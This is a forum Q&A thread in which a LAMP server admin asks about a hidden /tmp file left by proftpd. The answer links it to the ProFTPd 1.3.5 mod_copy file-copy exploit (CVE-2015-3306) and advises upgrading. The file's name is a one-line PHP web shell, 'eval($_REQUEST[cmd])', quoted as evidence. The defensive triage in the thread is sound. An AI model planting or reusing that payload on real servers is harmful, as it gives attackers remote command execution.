3

I recently discovered a hidden file in /tmp owned by proftpd that worries me a bit:

-rw-r--r-- 1 proftpd nogroup <timestamp> 86 .<?php eval($_REQUEST[cmd]); ?>

I tried to see its content in a text editor, but this was probably a bad move since it alters the last access time property. Anyway here is the output from stat:

 File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’ Size: 86 Blocks: 8 IO Block: 4096 regular file Device: fc00h/64512d Inode: 175564 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 113/ proftpd) Gid: (65534/ nogroup) Access: <another-timestamp> Modify: <one-timestamp> Change: <one-timestamp> Birth: -

Checking the proftpd log at the time the file was modified gives me a lot of entries like this:

<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory

Could this file be used as part of an exploit?

I am working in a LAMP server environment.

Improve this question

1 Answer 1

Reset to default
4

It seems that someone is using this exploit:

ProFTPd 1.3.5 - File Copy

https://www.exploit-db.com/exploits/36742/

Here is also CVE-2015-3306:

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306

Check your proftpd version proftpd -v, if it's still old version then update to 1.3.6rc1. If you want something better, then consider to use sftp and not ftp.

Improve this answer

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.